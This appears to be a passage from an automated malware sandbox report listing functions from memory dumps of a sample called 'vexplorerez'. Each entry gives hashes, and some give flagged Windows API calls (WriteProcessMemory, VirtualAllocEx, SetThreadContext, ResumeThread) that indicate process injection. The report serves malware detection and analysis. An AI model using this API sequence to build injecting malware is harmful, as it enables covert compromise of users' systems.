                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fa79871de98c818c07b1e3a27e4e28a29f639050fb5dd082fcc2a82a28eec1d4
                                                                            • Instruction ID: a5224068d43ee0d2d0b8a74fed11d00dba7d1dfdb3e818e9a18f1f9f90e2afc9
                                                                            • Opcode Fuzzy Hash: fa79871de98c818c07b1e3a27e4e28a29f639050fb5dd082fcc2a82a28eec1d4
                                                                            • Instruction Fuzzy Hash: 6CA25E70A00219DFDB15DFA9C884AAEBBB6BF8A304F148169E515EB365DF30DE41CB50
                                                                            Function 0184C298 Relevance: .3, Instructions: 347COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.3847708053.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_1840000_vexplorerez.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 642e741b5ec23a626cadf78d461bad343305462738a9c4350508e66312191144
                                                                            • Instruction ID: b051e199d2840ee1fd32d2d213d846c7e44113c52c2c0d95ea062fccd48c1921
                                                                            • Opcode Fuzzy Hash: 642e741b5ec23a626cadf78d461bad343305462738a9c4350508e66312191144
                                                                            • Instruction Fuzzy Hash: 81F1C174E01218CFEB64CFA9C940B9DBBF2BF89300F1481A9D549AB265DB705E85CF51
                                                                            Function 0184C7F8 Relevance: .2, Instructions: 230COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.3847708053.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_1840000_vexplorerez.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f587ca190d65a4c35e5bd45167a82413385998939d7ca823c9c40a4422573535
                                                                            • Instruction ID: 1ea92e6abd8cb12cbb537e0d8229e2bf01ac1838bf73260ab2c799203ed1ac7b
                                                                            • Opcode Fuzzy Hash: f587ca190d65a4c35e5bd45167a82413385998939d7ca823c9c40a4422573535
                                                                            • Instruction Fuzzy Hash: ABB1D574E0025CCFEB64CFAAC940B9DBBF6BF89300F14C0A9D549AB255DB705A858F51
                                                                            Function 0184BF68 Relevance: .2, Instructions: 177COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.3847708053.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_1840000_vexplorerez.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a6521f57ee8d2d40735e7cee93eea4b5068ad6098ecf22c209a950054a1c5ffb
                                                                            • Instruction ID: 42804f3c751555bc5256ede77ac9a9a5f398cd5540d298afa47afc619f456699
                                                                            • Opcode Fuzzy Hash: a6521f57ee8d2d40735e7cee93eea4b5068ad6098ecf22c209a950054a1c5ffb
                                                                            • Instruction Fuzzy Hash: 2A71D275E01608CFDB18DFAAC594A9DBBF2FF89301F248069D405AB365DB749A46CF10
                                                                            Function 0884E480 Relevance: 1.7, Strings: 1, Instructions: 444COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 5438 884e480-884e62c 5463 884e640-884e6f8 5438->5463 5464 884e62e-884e638 5438->5464 5476 884e6ff-884e702 5463->5476 5477 884e6fa-884e6fd 5463->5477 5464->5463 5478 884e705-884e718 5476->5478 5477->5478 5523 884e71b call 884ea00 5478->5523 5524 884e71b call 884e9f1 5478->5524 5525 884e71b call 884fe73 5478->5525 5481 884e721-884e760 call 884d0f0 5526 884e762 call 8513575 5481->5526 5527 884e762 call 85135a8 5481->5527 5485 884e768-884e8b6 5506 884e8e0-884e8e5 5485->5506 5507 884e8b8-884e8d2 5485->5507 5510 884e922-884e962 5506->5510 5519 884e8d2 call 8516cc0 5507->5519 5520 884e8d2 call 8516d50 5507->5520 5521 884e8d2 call 8516f18 5507->5521 5522 884e8d2 call 8516f28 5507->5522 5515 884e964-884e994 5510->5515 5516 884e9c1-884e9e3 5510->5516 5514 884e8d8-884e8df 5515->5510 5518 884e996-884e9e3 5515->5518 5519->5514 5520->5514 5521->5514 5522->5514 5523->5481 5524->5481 5525->5481 5526->5485 5527->5485
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.3871362885.0000000008840000.00000040.00000800.00020000.00000000.sdmp, Offset: 08840000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_8840000_vexplorerez.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @
                                                                            • API String ID: 0-2766056989
                                                                            • Opcode ID: 5767c741ab0ecae1095227d7875372bfca528f0272f0b8e369a8ba18ff6fefbd
                                                                            • Instruction ID: efcce2a5d0d988fadb0fd81eda5bdc64e92b1826d77959962069f6f816fca381
                                                                            • Opcode Fuzzy Hash: 5767c741ab0ecae1095227d7875372bfca528f0272f0b8e369a8ba18ff6fefbd
                                                                            • Instruction Fuzzy Hash: B2E1F335A19344CFC708EBB8E89856D7FB1FF89200F4554A9E885E73A1DE389C09CB61
                                                                            Function 0851E900 Relevance: 1.6, APIs: 1, Instructions: 123COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 5573 851e900-851e905 5574 851e907-851e90d 5573->5574 5575 851e958-851e95f 5573->5575 5576 851e960-851e978 5574->5576 5577 851e90f 5574->5577 5575->5576 5578 851e956-851e957 5576->5578 5579 851e97a-851e995 5576->5579 5580 851e912-851e928 5577->5580 5578->5575 5583 851e997-851e999 5579->5583 5584 851e9e8-851e9e9 5579->5584 5580->5580 5581 851e92a-851e953 5580->5581 5581->5578 5586 851e99b-851e9c1 5583->5586 5587 851e9ec-851ea48 VirtualProtect 5583->5587 5584->5587 5590 851ea51-851ea72 5587->5590 5591 851ea4a-851ea50 5587->5591 5591->5590
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.3870931806.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_8510000_vexplorerez.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4fc676809ed7b49cf6e5d9bb4329f7f69114298ef1f2d69a8fa2323c2a37aa5f
                                                                            • Instruction ID: 25fbb1dee4b76d1e4dffd61ac5b1f2ea5ee8ecdef42b188c8034be1908b339c6
                                                                            • Opcode Fuzzy Hash: 4fc676809ed7b49cf6e5d9bb4329f7f69114298ef1f2d69a8fa2323c2a37aa5f
                                                                            • Instruction Fuzzy Hash: DD414A7481A3C5ABDB52CFB9C4456DBFFA4AF46330F14828DE8A86B143C3319656CB61
                                                                            Function 0E4B0E48 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0E4B0EE0
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.3871916616.000000000E4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E4B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_e4b0000_vexplorerez.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessWrite
                                                                            • String ID:
                                                                            • API String ID: 3559483778-0
                                                                            • Opcode ID: 7ba0b5360b6df6b2aafda2f9a777f53d8943c1e944e5afa610f4aa3c5121c8ac
                                                                            • Instruction ID: c1f350155453bd398eacce3d2047ecc8cf5f83bcd7d0b8c22ae4578d8e5a1c62
                                                                            • Opcode Fuzzy Hash: 7ba0b5360b6df6b2aafda2f9a777f53d8943c1e944e5afa610f4aa3c5121c8ac
                                                                            • Instruction Fuzzy Hash: EF213571900309DFDB10CFA9C9817DEBBF4FF48310F10842AE659A7240D7789950CB60
                                                                            Function 0E4B0E50 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0E4B0EE0
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.3871916616.000000000E4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E4B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_e4b0000_vexplorerez.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessWrite
                                                                            • String ID:
                                                                            • API String ID: 3559483778-0
                                                                            • Opcode ID: cbe11fca66dc952ecda75cfa80010e5576e10205ef962fd0997a19c5a86f21b5
                                                                            • Instruction ID: 86e1583154af9898a81616054a01e8bff00b685a662c966fc19cf3052d389987
                                                                            • Opcode Fuzzy Hash: cbe11fca66dc952ecda75cfa80010e5576e10205ef962fd0997a19c5a86f21b5
                                                                            • Instruction Fuzzy Hash: EA211371900349DFDB10CFAAC885BDEBBF5FF88310F10842AEA59A7240D7799950CBA5
                                                                            Function 0E4B1B18 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0E4B1B96
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.3871916616.000000000E4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E4B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_e4b0000_vexplorerez.jbxd
                                                                            Similarity
                                                                            • API ID: ContextThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 983334009-0
                                                                            • Opcode ID: bbaf806689cca64dd5c6ab7929967df7ceb0c9d6534014d52de507c5ba5bf449
                                                                            • Instruction ID: 9fecff35a28e39821ebf74616e26be040657042492739cbbcc26492ac5d98e04
                                                                            • Opcode Fuzzy Hash: bbaf806689cca64dd5c6ab7929967df7ceb0c9d6534014d52de507c5ba5bf449
                                                                            • Instruction Fuzzy Hash: 5A213471D003098FDB10DFAAC485BEEBBF4AF88220F14842AD519A7340DB78A945CFA5
                                                                            Function 08C6FE18 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 08C6FE96
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.3871618502.0000000008C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_8c60000_vexplorerez.jbxd
                                                                            Similarity
                                                                            • API ID: ContextThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 983334009-0
                                                                            • Opcode ID: da4ff449623bc65af4ce349e44f4d84a12607b1f0c1adb93c058840f7069967b
                                                                            • Instruction ID: bfe7a47a0560b40d1cf440cbcae1003ec44403c3899664cb138b9c6a1b9e4d31
                                                                            • Opcode Fuzzy Hash: da4ff449623bc65af4ce349e44f4d84a12607b1f0c1adb93c058840f7069967b
                                                                            • Instruction Fuzzy Hash: 0A216571D003098FDB10CFAAC4857AEBBF4EF88320F10842ED519A7241DB78AA44CFA5
                                                                            Function 0E4B1340 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualProtectEx.KERNEL32(?,?,?,?,?), ref: 0E4B13BF
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.3871916616.000000000E4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E4B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_e4b0000_vexplorerez.jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            • Opcode ID: a9027d19f63f6bb3d69bd62e73d6e2aa1b2bc0092b6fbaf7e8725baa399c9ee7
                                                                            • Instruction ID: 6c500c42b20705a19771115749fd2d973960aa942987b7e528498b9a05729ddd
                                                                            • Opcode Fuzzy Hash: a9027d19f63f6bb3d69bd62e73d6e2aa1b2bc0092b6fbaf7e8725baa399c9ee7
                                                                            • Instruction Fuzzy Hash: F52116718002499FDB10CFAAC4447EEBBF5EF48320F14842AD559A7650DB799950DFA1
                                                                            Function 0E4B1B10 Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0E4B1B96
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.3871916616.000000000E4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E4B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_e4b0000_vexplorerez.jbxd
                                                                            Similarity
                                                                            • API ID: ContextThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 983334009-0
                                                                            • Opcode ID: 6e04709aae6cdf3e339f5fc3bb1c10c0c0fdedfd59101358f28130a642c14289
                                                                            • Instruction ID: fe3ba581b2d53439e58386dd857073c32f6a3b0c052a4762018447ab66e6aeae
                                                                            • Opcode Fuzzy Hash: 6e04709aae6cdf3e339f5fc3bb1c10c0c0fdedfd59101358f28130a642c14289
                                                                            • Instruction Fuzzy Hash: 64216871D003098FDB10CFAAC5857EEBBF0AF48314F24842AD959A7340DB789944CFA5
                                                                            Function 0E4B1348 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualProtectEx.KERNEL32(?,?,?,?,?), ref: 0E4B13BF
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.3871916616.000000000E4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E4B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_e4b0000_vexplorerez.jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            • Opcode ID: 8f19838f9c7b55de76168aa92de12fdc1899bfd620e2aacb30e4b920cf3d36d8
                                                                            • Instruction ID: 66c26d21afcd81c06f1424df61e6a8bf958d9d6a7d51ffd530c4d383ea8b3efc
                                                                            • Opcode Fuzzy Hash: 8f19838f9c7b55de76168aa92de12fdc1899bfd620e2aacb30e4b920cf3d36d8
                                                                            • Instruction Fuzzy Hash: 172135718003499FDB10CFAAC844BEEBBF4EF88320F10842AE519A7240DB799910DFA1
                                                                            Function 08824C18 Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DeleteFileW.KERNEL32(00000000), ref: 0882DCF0
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.3871213307.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_8820000_vexplorerez.jbxd
                                                                            Similarity
                                                                            • API ID: DeleteFile
                                                                            • String ID:
                                                                            • API String ID: 4033686569-0
                                                                            • Opcode ID: 1ddaa8838320d034f463e58f7206c69de845431cad98fc115a99173105876501
                                                                            • Instruction ID: 06f156bd1ba558d8c266fa1fb531be15467182186440dd5fe5f74fc47c57738c
                                                                            • Opcode Fuzzy Hash: 1ddaa8838320d034f463e58f7206c69de845431cad98fc115a99173105876501
                                                                            • Instruction Fuzzy Hash: 832115B1C0066ADBCB10CF9AC54479EFBB4AB48720F10822AD918A7740D778AA54CFA5
                                                                            Function 0851E9C8 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 0851EA3B
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.3870931806.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_8510000_vexplorerez.jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            • Opcode ID: 4f8adb4377c870fdef5dc2852bb1a37a703bce25905d26398248ddaeb5e27ec8
                                                                            • Instruction ID: 8c1d229b6f00324cf11d14c652c0d3fa835f2443b5226896aecb264aa5e40c70
                                                                            • Opcode Fuzzy Hash: 4f8adb4377c870fdef5dc2852bb1a37a703bce25905d26398248ddaeb5e27ec8
                                                                            • Instruction Fuzzy Hash: 9F21F2B59006499FDB10CF9AC584BDEBBF4FB48320F108029E958A7250D778AA54CFA1
                                                                            Function 0851E9C4 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 0851EA3B
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.3870931806.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_8510000_vexplorerez.jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            • Opcode ID: 7953127bbedf43f22fbca38d3468db1f3a94b4d514c07897792814ad9a5214d7
                                                                            • Instruction ID: f550d97162ea38db3f140fdda557cb176dddbacd29955a20b80783a9c1e39d39
                                                                            • Opcode Fuzzy Hash: 7953127bbedf43f22fbca38d3468db1f3a94b4d514c07897792814ad9a5214d7
                                                                            • Instruction Fuzzy Hash: 452103B59007099FDB10CF9AC585BDEBBF4FF48320F10842AE958A7250D378AA55CFA1
                                                                            Function 0E4B0AD8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0E4B0B46
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.3871916616.000000000E4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E4B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_e4b0000_vexplorerez.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 839d998f3a5e87d94f079bf9d846de064a53a6a6199307ce7b69ea193bfed81a
                                                                            • Instruction ID: 210cfbc026c4bf416a4378abb476ac316136e9de5146e5578bdf221c6b1edea0
                                                                            • Opcode Fuzzy Hash: 839d998f3a5e87d94f079bf9d846de064a53a6a6199307ce7b69ea193bfed81a
                                                                            • Instruction Fuzzy Hash: 2B1144728003499FDB10DFAAC844BDFBBF5AF88320F10841AE619A7250C775A910CBA1
                                                                            Function 0E4B0ADA Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0E4B0B46
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.3871916616.000000000E4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E4B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_e4b0000_vexplorerez.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 557ca296766a745997b3287636d85a5aaf6c8a3c9a486d0bf0b61c1625353c10
                                                                            • Instruction ID: 8effc1e2a3fe1433ec4bf87a1f2a9523201e7ada246563ceb880492c76d96564
                                                                            • Opcode Fuzzy Hash: 557ca296766a745997b3287636d85a5aaf6c8a3c9a486d0bf0b61c1625353c10
                                                                            • Instruction Fuzzy Hash: A9112672900249DFDB10DFA9C844BEFBBF5AF88324F14841AE619A7250C7759950CFA1
                                                                            Function 0E4B1D98 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.3871916616.000000000E4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E4B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_e4b0000_vexplorerez.jbxd
                                                                            Similarity
                                                                            • API ID: ResumeThread
                                                                            • String ID:
                                                                            • API String ID: 947044025-0
                                                                            • Opcode ID: ec1c912ac9a808f781591c735bf86961765a3bf339b3f5f1a569d5c18dd5dd43
                                                                            • Instruction ID: 12ff1bb67b7fc82f1d014c00c923c19ed8d2ba393bc5d3c427baa184e6481a88
                                                                            • Opcode Fuzzy Hash: ec1c912ac9a808f781591c735bf86961765a3bf339b3f5f1a569d5c18dd5dd43
                                                                            • Instruction Fuzzy Hash: 761158B1D003498FDB20DFA9C5457EEFBF4AF88320F24881AC559A7250DB79A900CFA4
                                                                            Function 0E4B1DA0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.3871916616.000000000E4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E4B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_e4b0000_vexplorerez.jbxd
                                                                            Similarity
                                                                            • API ID: ResumeThread
                                                                            • String ID:
                                                                            • API String ID: 947044025-0
                                                                            • Opcode ID: 38564577bed9bc355ac4d27264be0d15cf665e823bf53413fb0dd3edcf97df3f
                                                                            • Instruction ID: 9dd2ff6025a53a4a459caf71f8abe583c5ccdf1e2d4ad902020c5aed7519b80f
                                                                            • Opcode Fuzzy Hash: 38564577bed9bc355ac4d27264be0d15cf665e823bf53413fb0dd3edcf97df3f
                                                                            • Instruction Fuzzy Hash: DA1125B19003498FDB20DFAAC5457DFFBF4AF88624F24841AD519A7240DB79A940CBA5
                                                                            Function 0E4B0B88 Relevance: 1.5, APIs: 1, Instructions: 47memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0E4B0B46
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.3871916616.000000000E4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E4B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_e4b0000_vexplorerez.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: c6aea2805f9ed73a2c37fc9cac45ae752397bcfa310fe3dd25e2b9d3ee2d0557
                                                                            • Instruction ID: f8a2f59793402bff88fb759b12dbfdb7de1c715fcead2334132fc82922da1915
                                                                            • Opcode Fuzzy Hash: c6aea2805f9ed73a2c37fc9cac45ae752397bcfa310fe3dd25e2b9d3ee2d0557
                                                                            • Instruction Fuzzy Hash: 7601C07190434A8FCB25DBB8D42438EBFF0EF41365F2485CAC495972A1D6395981CB61
                                                                            Function 0E4B238A Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PostMessageW.USER32(?,?,?,?), ref: 0E4B23ED
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.3871916616.000000000E4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E4B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_e4b0000_vexplorerez.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost
                                                                            • String ID:
                                                                            • API String ID: 410705778-0
                                                                            • Opcode ID: 23b89c993b9faba2d9f954988fd6800f47b403fe999c103f98c560ab80549912
                                                                            • Instruction ID: f628c46c67649c50e6f3b072643ae600e738b3ae1ae70055c01c89e1d5d4f377
                                                                            • Opcode Fuzzy Hash: 23b89c993b9faba2d9f954988fd6800f47b403fe999c103f98c560ab80549912
                                                                            • Instruction Fuzzy Hash: BE1125B5800349CFDB10CF9AD584BDEBFF4EB48320F20841AD555A7610D3B5A944CFA5
                                                                            Function 0E4B2390 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PostMessageW.USER32(?,?,?,?), ref: 0E4B23ED
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.3871916616.000000000E4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E4B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_e4b0000_vexplorerez.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost
                                                                            • String ID:
                                                                            • API String ID: 410705778-0
                                                                            • Opcode ID: dc627da4e44826f56066d45f0b3c46bfa02ed5c5ce83e2aed7015e9ce42b4bb2
                                                                            • Instruction ID: 0ea38091e3cc20eb73113a5fee2272bce8a18a11d3449afd0f8ea853e6ebfc0d
                                                                            • Opcode Fuzzy Hash: dc627da4e44826f56066d45f0b3c46bfa02ed5c5ce83e2aed7015e9ce42b4bb2
                                                                            • Instruction Fuzzy Hash: 631103B5800349DFDB10DF9AC984BDEBFF8EB48320F10841AE518A7210D3B5A944CFA5
                                                                            Function 08841615 Relevance: .8, Instructions: 768COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.3871362885.0000000008840000.00000040.00000800.00020000.00000000.sdmp, Offset: 08840000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_8840000_vexplorerez.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d91a94669eac574d95c18fd8a62ad57a668fbf1a5195c7eda00662377d841705
                                                                            • Instruction ID: a9106044b98caa16f0eae1975e5108f9d13b5e160e45eefb1c21e7158025e4ed
                                                                            • Opcode Fuzzy Hash: d91a94669eac574d95c18fd8a62ad57a668fbf1a5195c7eda00662377d841705
                                                                            • Instruction Fuzzy Hash: D352B235B192148FD764EB78EC94B6DB7B1FF88200F4195A9E849E3350DE389C89CB61
                                                                            Function 0884F3F8 Relevance: .6, Instructions: 595COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.3871362885.0000000008840000.00000040.00000800.00020000.00000000.sdmp, Offset: 08840000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_8840000_vexplorerez.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ab7ade31f7ea7e49331af55e1ab99abbd8d63d479dcdf78cc4f3388fc209a5d6
                                                                            • Instruction ID: 7338e46fac04ed99312db6d84073177068dc184f66666ade109ef662dc34f1b8
                                                                            • Opcode Fuzzy Hash: ab7ade31f7ea7e49331af55e1ab99abbd8d63d479dcdf78cc4f3388fc209a5d6
                                                                            • Instruction Fuzzy Hash: 74123A31B1A3418FC705EBB8E89462E7BB2EF89200F55546DE885E7391DE389C05C762
                                                                            Function 01848FB8 Relevance: .6, Instructions: 591COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.3847708053.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_1840000_vexplorerez.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b79defbb534d51b05768fe5893e5d74a66f6f294bec247a0cc02394b49afb754
                                                                            • Instruction ID: b1e9281fb400b8c3c186e7436a2747174c1fc087877a3e0b4a1a62ca3bb8e480
                                                                            • Opcode Fuzzy Hash: b79defbb534d51b05768fe5893e5d74a66f6f294bec247a0cc02394b49afb754
                                                                            • Instruction Fuzzy Hash: 0C325F30A00209DFDB25CF69C884A9EBFF5BF89318F158559E919DB2A1DB30EE41CB50
                                                                            Function 0184EBD0 Relevance: .4, Instructions: 433COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.3847708053.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_1840000_vexplorerez.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a2de881229e74fa286f505337dc729b9c06d145ad3d3b6778e489ab58f0ff4b0
                                                                            • Instruction ID: 71168995a12931c4b66a6418ce663fa71194404d360755c5546eae4f34db8ca6
                                                                            • Opcode Fuzzy Hash: a2de881229e74fa286f505337dc729b9c06d145ad3d3b6778e489ab58f0ff4b0
